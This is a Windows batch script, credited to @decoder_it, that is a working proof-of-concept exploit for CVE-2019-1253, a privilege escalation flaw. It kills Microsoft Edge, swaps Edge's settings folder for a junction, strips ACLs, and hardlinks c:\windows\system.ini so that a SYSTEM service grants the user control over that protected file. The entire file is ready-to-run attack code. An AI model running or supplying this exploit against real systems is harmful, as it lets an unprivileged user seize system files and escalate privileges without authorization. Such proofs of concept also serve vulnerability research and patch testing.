appexploit.bat

:: padovah4ck's CVE-2019-1253 EoP version by modifying ACL of arbitrary file where SYSTEM has full control! 
:: simple "batch" version, all you need is an utility to create native hardlinks (ex: https://github.com/googleprojectzero/symboliclink-testing-tools/tree/master/CreateHardlink)
:: by @decoder_it - https://github.com/decoder-it
@echo off
set foo=c:\foodir
set filetoown=c:\windows\system.ini
if exist %foo% (
echo directory %foo% exists, delete it before!
exit /b
)
mkdir %foo%
taskkill /f /im MicrosoftEdge*
rd /q /s C:\Users\%username%\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings
mklink /j C:\Users\%username%\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings %foo%
start microsoft-edge:
timeout /t:10
taskkill /f /im MicrosoftEdge*
cd /d %foo%
del /q /ah *.*
del /q *.*
icacls %foo% /remove:g *S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194
icacls %foo% /remove:g %username%
:: pause
rd /q /s C:\Users\%username%\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings
c:\temp\createhardlink.exe %foo%\foot.txt %filetoown%
mklink /j C:\Users\%username%\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings %foo%
start microsoft-edge: